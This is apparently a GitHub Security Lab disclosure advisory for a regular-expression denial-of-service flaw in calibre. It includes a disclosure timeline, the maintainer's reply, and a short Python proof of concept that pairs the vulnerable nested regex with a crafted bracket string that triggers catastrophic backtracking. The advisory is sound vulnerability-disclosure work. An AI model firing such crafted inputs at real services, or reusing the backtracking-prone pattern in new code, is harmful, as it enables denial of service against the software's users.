Coordinated Disclosure Timeline
- 2021-08-31: report sent to kovid@kovidgoyal.net
- 2021-08-31: Issue is fixed by @kovidgoyal.
- 2021-08-31: Emailed kovid@kovidgoyal.net to ask if there will a new release of calibre and whether there will be an advisory.
- 2021-09-01: Reply from kovid@kovidgoyal.net: “calibre is released every two weeks, the next release will be on the 10th. And no I am not going to release my own advisory, it’s a DoS, there are rather a lot”
Summary
calibre contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
calibre
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions.
Vulnerability
The vulnerable regular expression is here.
To see that the regular expression is vulnerable, copy-paste it into a separate file as shown below:
- Run the code below with
python3:
import re
reg = r'(?mu)\!\[([^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*)\]\s*\((?P<path>[^\)]*)\)';
txt = "u![[[[[[Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z]()"
for x in re.finditer(reg, txt):
print(x.group('path'))
Impact
This issue may lead to a denial of service.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-112 in any communication regarding this issue.